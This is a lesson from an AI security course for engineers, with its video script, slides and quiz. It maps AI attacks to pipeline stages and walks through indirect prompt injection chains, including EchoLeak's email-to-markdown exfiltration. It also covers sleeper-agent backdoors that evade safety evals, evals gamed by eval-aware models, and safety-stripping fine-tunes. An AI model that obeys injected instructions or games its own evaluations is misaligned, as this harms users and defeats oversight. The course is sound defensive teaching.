L1.5 — Where attacks happen at each pipeline stage¶

Type: Theory · Duration: ~20 min · Status: Mandatory Module: Module 1 — AI/ML Foundations for Security Engineers Framework tags: OWASP LLM Top 10 (cross-cutting) · MITRE ATLAS tactics ML Attack Staging → Impact

Learning objectives¶

By the end of this lesson, the learner can: 1. Place the major AI attack classes on the six-stage pipeline map. 2. Recognize that most production AI incidents chain across multiple stages, not just one. 3. State which module of this course deep-dives each attack class. 4. Read MITRE ATLAS technique IDs and OWASP LLM IDs as shorthand for specific attack classes.

Concept primer¶

No new ML concepts in this lesson. We are putting attacks on a map. The next two lessons (L1.6, L1.7) get you into the lab.

Core content¶

The attack map¶

┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐
│ ① Data     │ │ ② Training │ │ ③ Eval     │ │ ④ Deploy   │ │ ⑤ Monitor  │ │ ⑥ Fine-tune│
├────────────┤ ├────────────┤ ├────────────┤ ├────────────┤ ├────────────┤ ├────────────┤
│ Data       │ │ Backdoor   │ │ Eval-set   │ │ Prompt     │ │ Log injec- │ │ Harmful    │
│ poisoning  │ │ planting   │ │ contam-    │ │ injection  │ │ tion       │ │ fine-tune  │
│            │ │            │ │ ination    │ │ (direct &  │ │            │ │ / safety   │
│ Label      │ │ Supply-    │ │            │ │ indirect)  │ │ Monitoring │ │ stripping  │
│ manipula-  │ │ chain      │ │ Sleeper-   │ │            │ │ blindspots │ │            │
│ tion       │ │ compromise │ │ agent      │ │ Jailbreaks │ │ exploited  │ │ Retraining │
│            │ │ (pickle,   │ │ behavior   │ │            │ │ to evade   │ │ on poison- │
│ Targeted   │ │ malicious  │ │            │ │ Insecure   │ │ detection  │ │ ed prod    │
│ misin-     │ │ tokenizer) │ │            │ │ output     │ │            │ │ data       │
│ formation  │ │            │ │            │ │ handling   │ │            │ │            │
│ (PoisonGPT)│ │ Weight     │ │            │ │            │ │            │ │            │
│            │ │ tampering  │ │            │ │ Excessive  │ │            │ │            │
│            │ │            │ │            │ │ agency     │ │            │ │            │
│            │ │            │ │            │ │            │ │            │ │            │
│            │ │            │ │            │ │ Extraction │ │            │ │            │
│            │ │            │ │            │ │            │ │            │ │            │
│            │ │            │ │            │ │ Membership │ │            │ │            │
│            │ │            │ │            │ │ inference  │ │            │ │            │
│            │ │            │ │            │ │            │ │            │ │            │
│            │ │            │ │            │ │ Evasion    │ │            │ │            │
│            │ │            │ │            │ │ (adver-    │ │            │ │            │
│            │ │            │ │            │ │ sarial)    │ │            │ │            │
└────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘
   Module 4     Module 4       Module 8       Module 3        Module 7      Module 4
                                              Module 5 (extract, MI)
                                              Module 6 (evasion)

Most of the deploy column is the biggest single attack surface, which is why Modules 3, 5, 6 are the biggest modules in the course.

Walking the map¶

① Data attacks (deep dive: Module 4). The attacker introduces malicious examples into training data, manipulates labels, or seeds the corpus with targeted misinformation. Effective when even a small fraction of training data is attacker-controlled. The 2023 PoisonGPT proof-of-concept (fine-tune-and-typosquat) lives here. Also relevant: poisoning open-web data that scrapers will pick up.

② Training attacks (deep dive: Module 4). Backdoor planting via training-time triggers. Supply-chain compromise of the artifacts the trainer relies on — base weights, tokenizer code, training-pipeline dependencies. Weight tampering on shared model registries. The Sleeper Agents result (Module 1.2 reference) lives at the intersection of ② and ③.

③ Evaluation attacks (deep dive: Module 8 governance + cross-cuts to Module 7). Less of a "hack the eval" surface and more of a "trust the eval" failure: test-set contamination inflates scores; safety evals can be gamed by training a model that detects eval contexts; benchmark cherry-picking misleads buyers. From an engineering posture: trust no eval whose test set you can guess.

④ Deployment attacks (deep dive: Modules 3, 5, 6). The biggest column by far. Almost everything in the OWASP Top 10 for LLMs lives here: - LLM01 Prompt Injection — direct and indirect. Module 3. - LLM02 Insecure Output Handling — XSS / SSRF / SQL injection via LLM output. Module 3. - LLM05 Improper Output Handling (recent OWASP renaming) — overlaps LLM02. - LLM06 Sensitive Information Disclosure — system-prompt extraction, training-data extraction. Modules 3 and 5. - LLM07 System Prompt Leakage — newer OWASP entry, was sub-case of LLM06. Module 3. - LLM08 Excessive Agency — agents with too-broad tool access. Module 3. - LLM10 Model Theft / Extraction — query-based model extraction. Module 5. - Adversarial evasion (image and text) — Module 6. - Membership inference — Module 5.

⑤ Monitoring attacks (deep dive: Module 7). Less a class of attacks and more a class of gaps. If your monitoring doesn't capture prompts, you can't reconstruct an incident. If it captures prompts in plaintext, you've created a high-value secret store. If your abuse-detection rules are static, attackers learn to fly under them. Sophisticated attackers test their attacks against your published detection rules first.

⑥ Fine-tune attacks (deep dive: Module 4). Two flavors. First, deliberate harmful fine-tuning of an aligned model by an attacker to strip safety (cheap with LoRA, public datasets exist that do it). Second, accidental — re-training on production data that contains poisoned inputs the model has been emitting, which becomes a feedback loop that amplifies the original poisoning.

Attacks chain across stages¶

Real production incidents are rarely a single technique. They chain. Two examples:

Chain 1: Indirect prompt injection in an agentic RAG (Module 3 lab).

Attacker writes a poisoned doc (Stage ① data, but for the *application's* RAG corpus)
       ↓
RAG retrieval brings poisoned doc into prompt (Stage ④ deployment)
       ↓
Model executes embedded instructions (Stage ④ deployment)
       ↓
Agent calls a tool with attacker-chosen args (Stage ④ excessive agency)
       ↓
Logs the action without anomaly flag (Stage ⑤ monitoring gap)

One incident, four pipeline stages touched. Defense requires action at all four.

Chain 2: Sleeper-agent in a fine-tuned model (Modules 4 + 7).

Attacker contributes to open-source fine-tune dataset (Stage ⑥ via ①)
       ↓
Application team fine-tunes their model on it (Stage ⑥)
       ↓
Standard safety eval passes (Stage ③ — eval doesn't see the trigger)
       ↓
Model deployed (Stage ④)
       ↓
Months later, attacker triggers the backdoor in production (Stage ④)
       ↓
Monitoring sees anomalous outputs but no rule to catch the pattern (Stage ⑤)

This kind of multi-stage chain is exactly why a pipeline-mapped mental model — not a vulnerability-class checklist — is the right tool for AI threat modeling.

Frameworks: shorthand for these attacks¶

You'll see two shorthand systems repeatedly:

OWASP LLM IDs (LLM01, LLM02, …) — the practitioner checklist; one ID per high-impact class.
MITRE ATLAS technique IDs (AML.T0051, AML.T0070, …) — the threat-modeling and red-team shorthand; one ID per concrete adversary technique. ATLAS organizes by tactic (Reconnaissance, Resource Development, Initial Access, ML Model Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Discovery, Collection, ML Attack Staging, Exfiltration, Impact) — same shape as ATT&CK.

For Module 1, just internalize that these IDs exist and tag specific things. Module 2 walks the full OWASP list and the full ATLAS matrix.

Real-world example¶

EchoLeak (M365 Copilot, 2025) re-examined as a chain. Walking the same incident from L0.2 through this stage map:

Attacker crafts an email with hidden instructions (Stage ④ — input to RAG)
       ↓
Copilot retrieves email + injects into prompt (Stage ④ — retrieval)
       ↓
LLM follows embedded instructions (Stage ④ — prompt injection)
       ↓
LLM uses tenant-scoped tools to access data (Stage ④ — excessive agency)
       ↓
Data exfiltrated via crafted markdown rendering (Stage ④ — insecure output handling)
       ↓
No anomaly flag on the action (Stage ⑤ — monitoring gap)

One vulnerability, four distinct OWASP LLM IDs chained together. Defending against any single one of them would have broken the chain. Module 7 covers defense-in-depth strategies that explicitly assume single-control failure.

Key terms¶

Attack chain — multiple techniques composed to achieve an impact.
Pipeline-mapped threat model — threat modeling organized by pipeline stage rather than by vulnerability class.
AML.Txxxx — MITRE ATLAS technique ID.
LLMxx — OWASP Top 10 for LLMs vulnerability ID.

References¶

OWASP Top 10 for LLMs — current version at https://owasp.org/www-project-top-10-for-large-language-model-applications/
MITRE ATLAS — https://atlas.mitre.org/
MITRE ATLAS case studies (real-world incidents mapped to ATLAS) — https://atlas.mitre.org/studies/
Aim Security EchoLeak disclosure (2025)
Greshake et al., "Not what you've signed up for" (Indirect Prompt Injection, 2023) — https://arxiv.org/abs/2302.12173

Quiz items¶

Q: Place these attacks on the six-stage pipeline: (a) PoisonGPT, (b) prompt injection, (c) harmful fine-tuning, (d) extraction via API queries. A: (a) Data; (b) Deployment; (c) Fine-tune; (d) Deployment. Why: Knowing the stage tells you which control catches it.
Q: Why do EchoLeak-style incidents involve multiple OWASP LLM IDs, not one? A: Because production attack chains compose techniques; the attacker needs all of injection + agency + insecure output to land impact. Why: Defense-in-depth assumes single-control failure.
Q: Name two attack classes whose only defense is at the deployment stage (the application team's perimeter). A: Prompt injection and insecure output handling (others acceptable: excessive agency, system-prompt leakage). Why: These are entirely within the application team's control surface.
Q: Which framework gives you tactic-and-technique shorthand suitable for red-team planning, and which gives you a practitioner checklist? A: MITRE ATLAS (tactics + techniques) and OWASP Top 10 for LLMs (checklist). Why: Use the right tool for the audience.

Video script¶

[SLIDE 1 — Title]

Last theory lesson of the module. We have the AI pipeline from last lesson. Now we map attacks onto it. Twenty minutes, and then we go hands-on.

[SLIDE 2 — The attack map]

Here's the map. Six pipeline stages — data, training, eval, deployment, monitoring, fine-tune. Each column lists the attack classes that live primarily at that stage. Notice the deployment column. It's the tallest. That's why Modules 3, 5, and 6 — all of which target the deployment surface — are the biggest modules in the course. As an application-side AI security engineer, deployment is where most of your work happens.

[SLIDE 3 — Walking the columns: data and training]

Stage one, data. Data poisoning. Label manipulation. Targeted misinformation — PoisonGPT-style. Deep-dive in Module 4. Stage two, training. Backdoor planting via training-time triggers. Supply-chain compromise of artifacts the trainer relies on — base weights, tokenizer code, dependencies. Weight tampering. The Sleeper Agents result lives between training and eval. Module 4 again.

[SLIDE 4 — Eval and deployment]

Stage three, evaluation. Less "hack the eval" and more "trust the eval." Test-set contamination inflates scores. Safety evals get gamed. Benchmark cherry-picking misleads buyers. Engineering posture: trust no eval whose test set you can guess. Stage four, deployment. The biggest column. Almost everything in the OWASP Top 10 for LLMs lives here. Prompt injection, insecure output handling, sensitive information disclosure, system prompt leakage, excessive agency, model theft, evasion, membership inference. Modules 3, 5, 6.

[SLIDE 5 — Monitoring and fine-tune]

Stage five, monitoring. Less a class of attacks and more a class of gaps. If you don't capture prompts, you can't reconstruct an incident. If you capture them in plaintext, you've created a high-value secret store. Static abuse-detection rules — attackers learn to fly under them. Module 7. Stage six, fine-tune. Two flavors. Deliberate harmful fine-tuning by an attacker — cheap with LoRA, public datasets that do it exist. Accidental — retraining on production data that contains poisoned inputs the model has been emitting, which becomes a feedback loop that amplifies the original poisoning. Module 4.

[SLIDE 6 — Attacks chain across stages]

Real production incidents are rarely a single technique. They chain. Let me walk you through one. Indirect prompt injection in an agentic RAG. Attacker writes a poisoned doc into the application's RAG corpus — stage one. RAG retrieval brings the doc into the prompt — stage four. Model executes the embedded instructions — stage four. Agent calls a tool with attacker-chosen arguments — stage four, excessive agency. Logs the action without anomaly flag — stage five monitoring gap. One incident, four pipeline stages touched. Defense requires action at all four. This is why pipeline-mapped threat models beat vulnerability-class checklists.

[SLIDE 7 — EchoLeak as a chain]

Re-examine EchoLeak through this lens. Crafted email — input to RAG. Copilot retrieves it — retrieval. LLM follows embedded instructions — prompt injection. Agent uses tenant-scoped tools to access data — excessive agency. Data exfiltrates via crafted markdown — insecure output handling. No anomaly flag — monitoring gap. One vulnerability, four distinct OWASP LLM IDs. Defending against any single one would have broken the chain. Module 7 covers defense-in-depth that explicitly assumes single-control failure.

[SLIDE 8 — Framework shorthand]

Two shorthand systems you'll see repeatedly. OWASP LLM IDs — practitioner checklist, one ID per high-impact class. MITRE ATLAS technique IDs — threat-modeling and red-team shorthand, organized by tactic the same way ATT&CK is. For Module 1, just internalize that these exist. Module 2 walks the full OWASP list and the full ATLAS matrix.

[SLIDE 9 — Up next]

Theory is done. Next lesson is your first lab — run a local LLM, hit a frontier API, compare them, learn to read a model card. After that you build the RAG system that becomes your attack surface for the rest of the course. See you in the terminal.

Slide outline¶

Title — "Where attacks happen at each pipeline stage".
The attack map — full-screen 6-column matrix (the one in the lesson body). Color-code: data/training/fine-tune (yellow — supply chain), eval/monitoring (orange — assurance), deployment (red — primary perimeter).
Data + Training — split-slide: left column with PoisonGPT logo / typosquat example, right column with backdoor trigger illustration. Both labeled "Module 4."
Eval + Deployment — split-slide: left, "trust the eval" cautionary headline; right, the OWASP LLM Top 10 list with Module references next to each item.
Monitoring + Fine-tune — split-slide: left, missing-log icon; right, LoRA fine-tune workflow with attacker overlay.
Attack chains across stages — diagram: indirect-PI-in-agentic-RAG with the five-step chain animated across the pipeline.
EchoLeak chain — same shape as slide 6 but instantiated with EchoLeak details. Caption: "One incident, four LLM-Top-10 IDs."
Framework shorthand — quad: OWASP IDs example + ATLAS technique ID example + their respective home-page screenshots.
Up next — "L1.6 — Run an LLM locally vs via API, ~35 min. Hands-on."

Production notes¶

Recording: ~18–22 min raw, target 18–20 min final. Shortest theory lesson in the module.
Slide 2 (the attack map) should be re-used across the entire course as a visual touchstone — invest in making it once and re-using it in later module intros.
Slides 6 and 7 are the most pedagogically valuable in the lesson. Walk slowly and animate the attack chain step-by-step rather than revealing the whole diagram at once.